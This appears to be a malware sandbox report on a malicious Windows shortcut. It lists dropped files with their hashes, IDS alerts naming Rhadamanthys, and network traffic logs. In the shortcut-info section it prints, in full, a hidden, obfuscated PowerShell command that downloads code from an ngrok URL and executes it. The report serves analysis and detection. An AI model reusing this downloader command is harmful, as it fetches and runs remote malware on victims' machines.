                                                                                                                                                                                                                                                                                                      Preview:(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir7264_485099217\CRX_INSTALL\manifest.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):962
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.698567446030411
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:24:1Hg9+D3DRnbuF2+sUrzUu+Y9VwE+Fg41T1O:NBqY+6E+F7JO
                                                                                                                                                                                                                                                                                                      MD5:E805E9E69FD6ECDCA65136957B1FB3BE
                                                                                                                                                                                                                                                                                                      SHA1:2356F60884130C86A45D4B232A26062C7830E622
                                                                                                                                                                                                                                                                                                      SHA-256:5694C91F7D165C6F25DAF0825C18B373B0A81EA122C89DA60438CD487455FD6A
                                                                                                                                                                                                                                                                                                      SHA-512:049662EF470D2B9E030A06006894041AE6F787449E4AB1FBF4959ADCB88C6BB87A957490212697815BB3627763C01B7B243CF4E3C4620173A95795884D998A75
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "content_scripts": [ {.. "js": [ "content.js" ],.. "matches": [ "https://chrome.google.com/webstore/*" ].. }, {.. "js": [ "content_new.js" ],.. "matches": [ "https://chromewebstore.google.com/*" ].. } ],.. "description": "Edge relevant text changes on select websites to improve user experience and precisely surfaces the action they want to take.",.. "key": "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu06p2Mjoy6yJDUUjCe8Hnqvtmjll73XqcbylxFZZWe+MCEAEK+1D0Nxrp0+IuWJL02CU3jbuR5KrJYoezA36M1oSGY5lIF/9NhXWEx5GrosxcBjxqEsdWv/eDoOOEbIvIO0ziMv7T1SUnmAA07wwq8DXWYuwlkZU/PA0Mxx0aNZ5+QyMfYqRmMpwxkwPG8gyU7kmacxgCY1v7PmmZo1vSIEOBYrxl064w5Q6s/dpalSJM9qeRnvRMLsszGY/J2bjQ1F0O2JfIlBjCOUg/89+U8ZJ1mObOFrKO4um8QnenXtH0WGmsvb5qBNrvbWNPuFgr2+w5JYlpSQ+O8zUCb8QZwIDAQAB",.. "manifest_version": 3,.. "name": "Edge relevant text changes",.. "update_url": "https://edge.microsoft.com/extensionwebstorebase/v1/crx",.. "version": "1.2.1"..}..

                                                                                                                                                                                                                                                                                                      C:\Users\user\Downloads\1a0dc6db-9216-46fc-8057-389dca5d8cfb.tmp

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:PDF document, version 1.7, 2 pages
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):106848
                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.916846950395155
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:1536:/t7dsAjcYfnYKHqU4UDgCWuJhG/oEMKTKipqgdrP9sW32prNybV0MLQF2C/hy1T:lGY1YUPDgK6TlrPTsSVC/h8
                                                                                                                                                                                                                                                                                                      MD5:14E5098503C76B02728CDE6EA96538C3
                                                                                                                                                                                                                                                                                                      SHA1:88B84351C73D8E918BEA3DD7EB2178B9C466A342
                                                                                                                                                                                                                                                                                                      SHA-256:7519554506D088A93C531F74F055E8966215CCC42C647382F6A95705172DCAFF
                                                                                                                                                                                                                                                                                                      SHA-512:F8A88B3E86503F4422F599A279EBC8C9F3B552AC3F7495C92780FFE2B406FD1F2F855F0B47D1D0F543E058E90E7146A54ABF86B611FE4F071F46ECE6927D6087
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:%PDF-1.7..%......1 0 obj..<</Type/Catalog/Pages 2 0 R/Lang(en) /StructTreeRoot 25 0 R/MarkInfo<</Marked true>>/Metadata 85 0 R/ViewerPreferences 86 0 R>>..endobj..2 0 obj..<</Type/Pages/Count 2/Kids[ 3 0 R 20 0 R] >>..endobj..3 0 obj..<</Type/Page/Parent 2 0 R/Resources<</Font<</F1 5 0 R/F2 9 0 R/F3 11 0 R/F4 16 0 R>>/ExtGState<</GS7 7 0 R/GS8 8 0 R>>/XObject<</Image18 18 0 R/Image19 19 0 R>>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/MediaBox[ 0 0 612 792] /Contents 4 0 R/Group<</Type/Group/S/Transparency/CS/DeviceRGB>>/Tabs/S/StructParents 0>>..endobj..4 0 obj..<</Filter/FlateDecode/Length 2726>>..stream..x..[Y..F.~.`.C.EZH4....0G.8k....Y`.....0.H..g'.~..I.C.Wk..G..&....l.7..`WWo...g..wI.`...~z.__...;.....|./..,..0..../~..+./n?^^...3..q~y.a..8S".4g..=.wV0..-jx![.......Fl.o......u...`?..cl. w.0../...T..pup..b....9...x.F.r<.......Q._.........%^...G.Y`1GR.....C)7.X...j..X..f.8.e2......4.Uy.C...c<...L@S.+..,&.01........#.....0...q...Pz.......G..#.......+.p..."..K8..B....

                                                                                                                                                                                                                                                                                                      C:\Users\user\Downloads\Lewis Silkin LLP.pdf (copy)

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:PDF document, version 1.7, 2 pages
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):106848
                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.916846950395155
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:1536:/t7dsAjcYfnYKHqU4UDgCWuJhG/oEMKTKipqgdrP9sW32prNybV0MLQF2C/hy1T:lGY1YUPDgK6TlrPTsSVC/h8
                                                                                                                                                                                                                                                                                                      MD5:14E5098503C76B02728CDE6EA96538C3
                                                                                                                                                                                                                                                                                                      SHA1:88B84351C73D8E918BEA3DD7EB2178B9C466A342
                                                                                                                                                                                                                                                                                                      SHA-256:7519554506D088A93C531F74F055E8966215CCC42C647382F6A95705172DCAFF
                                                                                                                                                                                                                                                                                                      SHA-512:F8A88B3E86503F4422F599A279EBC8C9F3B552AC3F7495C92780FFE2B406FD1F2F855F0B47D1D0F543E058E90E7146A54ABF86B611FE4F071F46ECE6927D6087
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:%PDF-1.7..%......1 0 obj..<</Type/Catalog/Pages 2 0 R/Lang(en) /StructTreeRoot 25 0 R/MarkInfo<</Marked true>>/Metadata 85 0 R/ViewerPreferences 86 0 R>>..endobj..2 0 obj..<</Type/Pages/Count 2/Kids[ 3 0 R 20 0 R] >>..endobj..3 0 obj..<</Type/Page/Parent 2 0 R/Resources<</Font<</F1 5 0 R/F2 9 0 R/F3 11 0 R/F4 16 0 R>>/ExtGState<</GS7 7 0 R/GS8 8 0 R>>/XObject<</Image18 18 0 R/Image19 19 0 R>>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/MediaBox[ 0 0 612 792] /Contents 4 0 R/Group<</Type/Group/S/Transparency/CS/DeviceRGB>>/Tabs/S/StructParents 0>>..endobj..4 0 obj..<</Filter/FlateDecode/Length 2726>>..stream..x..[Y..F.~.`.C.EZH4....0G.8k....Y`.....0.H..g'.~..I.C.Wk..G..&....l.7..`WWo...g..wI.`...~z.__...;.....|./..,..0..../~..+./n?^^...3..q~y.a..8S".4g..=.wV0..-jx![.......Fl.o......u...`?..cl. w.0../...T..pup..b....9...x.F.r<.......Q._.........%^...G.Y`1GR.....C)7.X...j..X..f.8.e2......4.Uy.C...c<...L@S.+..,&.01........#.....0...q...Pz.......G..#.......+.p..."..K8..B....

                                                                                                                                                                                                                                                                                                      C:\Users\user\Downloads\Unconfirmed 849149.crdownload (copy)

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:PDF document, version 1.7, 2 pages
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):106848
                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.916846950395155
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:1536:/t7dsAjcYfnYKHqU4UDgCWuJhG/oEMKTKipqgdrP9sW32prNybV0MLQF2C/hy1T:lGY1YUPDgK6TlrPTsSVC/h8
                                                                                                                                                                                                                                                                                                      MD5:14E5098503C76B02728CDE6EA96538C3
                                                                                                                                                                                                                                                                                                      SHA1:88B84351C73D8E918BEA3DD7EB2178B9C466A342
                                                                                                                                                                                                                                                                                                      SHA-256:7519554506D088A93C531F74F055E8966215CCC42C647382F6A95705172DCAFF
                                                                                                                                                                                                                                                                                                      SHA-512:F8A88B3E86503F4422F599A279EBC8C9F3B552AC3F7495C92780FFE2B406FD1F2F855F0B47D1D0F543E058E90E7146A54ABF86B611FE4F071F46ECE6927D6087
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:%PDF-1.7..%......1 0 obj..<</Type/Catalog/Pages 2 0 R/Lang(en) /StructTreeRoot 25 0 R/MarkInfo<</Marked true>>/Metadata 85 0 R/ViewerPreferences 86 0 R>>..endobj..2 0 obj..<</Type/Pages/Count 2/Kids[ 3 0 R 20 0 R] >>..endobj..3 0 obj..<</Type/Page/Parent 2 0 R/Resources<</Font<</F1 5 0 R/F2 9 0 R/F3 11 0 R/F4 16 0 R>>/ExtGState<</GS7 7 0 R/GS8 8 0 R>>/XObject<</Image18 18 0 R/Image19 19 0 R>>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/MediaBox[ 0 0 612 792] /Contents 4 0 R/Group<</Type/Group/S/Transparency/CS/DeviceRGB>>/Tabs/S/StructParents 0>>..endobj..4 0 obj..<</Filter/FlateDecode/Length 2726>>..stream..x..[Y..F.~.`.C.EZH4....0G.8k....Y`.....0.H..g'.~..I.C.Wk..G..&....l.7..`WWo...g..wI.`...~z.__...;.....|./..,..0..../~..+./n?^^...3..q~y.a..8S".4g..=.wV0..-jx![.......Fl.o......u...`?..cl. w.0../...T..pup..b....9...x.F.r<.......Q._.........%^...G.Y`1GR.....C)7.X...j..X..f.8.e2......4.Uy.C...c<...L@S.+..,&.01........#.....0...q...Pz.......G..#.......+.p..."..K8..B....

                                                                                                                                                                                                                                                                                                      C:\Users\user\Videos\DiskTuner\Bin\DiskTuner.exe

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\1061714629.exe
                                                                                                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):979567349
                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.044015480209425
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:
                                                                                                                                                                                                                                                                                                      MD5:A9BE0EBB1CA01D7F9DB6A801CD111725
                                                                                                                                                                                                                                                                                                      SHA1:EC0FD376ADA859BAF234C761951237EF1E3C7060
                                                                                                                                                                                                                                                                                                      SHA-256:11BA48C61A24E61ECA3D3A83EC1815F0FDBFE8EBDEA5521A1C661A01DBBB96FC
                                                                                                                                                                                                                                                                                                      SHA-512:02360FCB5C2F413BE350E0EE5A6E20E2D5E7E4D56CD7A0F039BC5B267E0ACDCF922696F1028D6BF3BC4C06584E5111A7FFF2EA4633198BC7F2A2132E7342365F
                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                      Joe Sandbox View:
                                                                                                                                                                                                                                                                                                      • Filename: taCCGTk8n1.lnk, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.................z..............z........#.............................Rich..................PE..L......C.....................`....................@...........................6.....Y.$..............................................."..............................................................................................................text............................... ..`.rdata...|..........................@..@.data....)...P.......P..............@....rsrc........."......0..............@..@................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                      C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):55
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.306461250274409
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                                                                                                                                                                                                      MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                                                                                                                                                                                      SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                                                                                                                                                                                      SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                                                                                                                                                                                      SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                                                                                                                                                                                                                                                      C:\Windows\appcompat\Programs\Amcache.hve

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):1835008
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.417607953135142
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:6144:Icifpi6ceLPL9skLmb0mNSWSPtaJG8nAgex285i2MMhA20X4WABlGuN75+:9i58NSWIZBk2MM6AFB9o
                                                                                                                                                                                                                                                                                                      MD5:9AEF069B3EEB6853D3E36DF8D3B7AA87
                                                                                                                                                                                                                                                                                                      SHA1:EEB6990055EAC59AEEDCBD82C30E824E64B8ECD5
                                                                                                                                                                                                                                                                                                      SHA-256:C5720E7C6E502AEE108F2C9BF6E6A98CD186A01CC764A21B76BB26B1363C61E4
                                                                                                                                                                                                                                                                                                      SHA-512:688AC23C3B400B62007D4A6701EF489B43A08A98DCB75A54BCF19212ED581611A172C4C55FF5473EA940647FD049948E584FEB23D20286D752E02886F8385D5C
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:regfE...E....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm~.T.6K...............................................................................................................................................................................................................................................................................................................................................VC.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                      Static File Info

                                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                                      File type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=11, Archive, ctime=Thu Nov 28 22:32:21 2024, mtime=Sun Dec 1 16:36:54 2024, atime=Thu Nov 28 22:32:21 2024, length=289792, window=hide
                                                                                                                                                                                                                                                                                                      Entropy (8bit):3.726253955470652
                                                                                                                                                                                                                                                                                                      TrID:
                                                                                                                                                                                                                                                                                                      • Windows Shortcut (20020/1) 100.00%
                                                                                                                                                                                                                                                                                                      File name:l92fYljXWF.lnk
                                                                                                                                                                                                                                                                                                      File size:2'614 bytes
                                                                                                                                                                                                                                                                                                      MD5:bbcc1b77a1f7b345989d06a2d72a2557
                                                                                                                                                                                                                                                                                                      SHA1:db11a849bb590f0dc4959eb03c43b9bb8575857c
                                                                                                                                                                                                                                                                                                      SHA256:7bf94eeba4e03807a11b7957cbc90442c1066aff96258bed4f2cefc89c66abaa
                                                                                                                                                                                                                                                                                                      SHA512:54532b7c4ed7d509bd0b8813e4333ee1047c033802f2891bbb1c9090331f1079d084fcba177a58c9c57c4ca2790c9667094bb6b12c77c06d2ec011613a957ce2
                                                                                                                                                                                                                                                                                                      SSDEEP:48:8GIgax4PsU/ucJeCLOrWlGd0lL4XuH4Xv3SsgoQYk:8fgaxEs2ucJfOQdl2uWvZg5Y
                                                                                                                                                                                                                                                                                                      TLSH:3951AC252FD51738F3F74E368977B2518E3AB946AC324F6E408045880862B15DCB6F2B
                                                                                                                                                                                                                                                                                                      File Content Preview:L..................F.@.. ....Q...A.......D.......A...l......................5....P.O. .:i.....+00.../C:\...................V.1......Y'...Windows.@........OwH.Y(...........................-...W.i.n.d.o.w.s.....Z.1......Y)...System32..B........OwH.YI.......

                                                                                                                                                                                                                                                                                                      File Icon

                                                                                                                                                                                                                                                                                                      Icon Hash:72d282828e8d8dd5

                                                                                                                                                                                                                                                                                                      Static Windows Shortcut Info

                                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                                      Relative Path:..\..\..\..\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                      Command Line Argument:/c pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias 29ca71 curl ; sal a4a9b9 iEx ; a4a9b9(29ca71 -Uri https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/147a893e0e699b17117c599fde51f7ef -UseBasicParsing)
                                                                                                                                                                                                                                                                                                      Icon location:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

                                                                                                                                                                                                                                                                                                      Network Behavior

                                                                                                                                                                                                                                                                                                      Suricata IDS Alerts

                                                                                                                                                                                                                                                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                                                                                      2024-12-10T18:41:32.379441+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749726162.125.69.18443TCP
                                                                                                                                                                                                                                                                                                      2024-12-10T18:41:47.808333+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749816162.125.69.18443TCP
                                                                                                                                                                                                                                                                                                      2024-12-10T18:42:19.820244+01002854802ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert1104.161.43.182845192.168.2.749915TCP

                                                                                                                                                                                                                                                                                                      Network Port Distribution

                                                                                                                                                                                                                                                                                                      TCP Packets

                                                                                                                                                                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:10.309408903 CET49677443192.168.2.720.50.201.200
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:10.683737040 CET49677443192.168.2.720.50.201.200
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:11.105711937 CET49671443192.168.2.7204.79.197.203
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:11.433825970 CET49677443192.168.2.720.50.201.200
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:12.933804989 CET49677443192.168.2.720.50.201.200
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:15.715097904 CET49674443192.168.2.7104.98.116.138
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:15.715097904 CET49675443192.168.2.7104.98.116.138
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:15.816078901 CET49672443192.168.2.7104.98.116.138
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:15.918142080 CET49677443192.168.2.720.50.201.200
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:18.210407972 CET49702443192.168.2.718.192.31.165
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:18.210448027 CET4434970218.192.31.165192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:18.210536003 CET49702443192.168.2.718.192.31.165
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:18.225738049 CET49702443192.168.2.718.192.31.165
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:18.225755930 CET4434970218.192.31.165192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:18.897891998 CET44349700104.98.116.138192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:18.897974014 CET49700443192.168.2.7104.98.116.138
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:19.614320040 CET4434970218.192.31.165192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:19.614442110 CET49702443192.168.2.718.192.31.165
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:19.618594885 CET49702443192.168.2.718.192.31.165
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:19.618604898 CET4434970218.192.31.165192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:19.618917942 CET4434970218.192.31.165192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:19.630132914 CET49702443192.168.2.718.192.31.165
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:19.671336889 CET4434970218.192.31.165192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:20.715037107 CET49671443192.168.2.7204.79.197.203
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:21.773505926 CET4434970218.192.31.165192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:21.773756027 CET4434970218.192.31.165192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:21.777342081 CET49702443192.168.2.718.192.31.165
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:21.777352095 CET4434970218.192.31.165192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:21.777362108 CET49702443192.168.2.718.192.31.165
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:21.777445078 CET49702443192.168.2.718.192.31.165
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:21.871458054 CET49677443192.168.2.720.50.201.200
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:21.919668913 CET49708443192.168.2.7162.125.69.18
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:21.919723988 CET44349708162.125.69.18192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:21.919800043 CET49708443192.168.2.7162.125.69.18
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:21.920089960 CET49708443192.168.2.7162.125.69.18
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:21.920105934 CET44349708162.125.69.18192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:23.401101112 CET44349708162.125.69.18192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:23.401171923 CET49708443192.168.2.7162.125.69.18
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:23.403568983 CET49708443192.168.2.7162.125.69.18
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:23.403578997 CET44349708162.125.69.18192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:23.403853893 CET44349708162.125.69.18192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:23.404819012 CET49708443192.168.2.7162.125.69.18
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:23.451329947 CET44349708162.125.69.18192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:24.560467958 CET44349708162.125.69.18192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:24.560539961 CET44349708162.125.69.18192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:24.560595036 CET49708443192.168.2.7162.125.69.18
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:24.560628891 CET49708443192.168.2.7162.125.69.18
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:24.563919067 CET49708443192.168.2.7162.125.69.18
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:24.852164984 CET49714443192.168.2.7162.125.69.15
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:24.852222919 CET44349714162.125.69.15192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:24.852329016 CET49714443192.168.2.7162.125.69.15
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:24.852622986 CET49714443192.168.2.7162.125.69.15
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:24.852633953 CET44349714162.125.69.15192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:26.275840044 CET44349714162.125.69.15192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:26.275898933 CET49714443192.168.2.7162.125.69.15
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:26.275927067 CET44349714162.125.69.15192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:26.275959969 CET49714443192.168.2.7162.125.69.15
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:26.278064966 CET49714443192.168.2.7162.125.69.15
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:26.278078079 CET44349714162.125.69.15192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:26.278382063 CET44349714162.125.69.15192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:26.279398918 CET49714443192.168.2.7162.125.69.15
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:26.323337078 CET44349714162.125.69.15192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:26.775928020 CET49700443192.168.2.7104.98.116.138
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:26.776453972 CET49720443192.168.2.7104.98.116.138
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:26.776489019 CET44349720104.98.116.138192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:26.776580095 CET49720443192.168.2.7104.98.116.138
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:26.787453890 CET49720443192.168.2.7104.98.116.138
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:26.787470102 CET44349720104.98.116.138192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:26.895236015 CET44349700104.98.116.138192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:27.155901909 CET44349714162.125.69.15192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:27.157016039 CET44349714162.125.69.15192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:27.157082081 CET49714443192.168.2.7162.125.69.15
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:27.164055109 CET49714443192.168.2.7162.125.69.15
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:29.629220009 CET49726443192.168.2.7162.125.69.18
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:29.629259109 CET44349726162.125.69.18192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:29.631679058 CET49726443192.168.2.7162.125.69.18
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:29.631679058 CET49726443192.168.2.7162.125.69.18
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:29.631711960 CET44349726162.125.69.18192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:31.182631016 CET44349726162.125.69.18192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:31.230756044 CET49726443192.168.2.7162.125.69.18
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:31.334685087 CET49726443192.168.2.7162.125.69.18
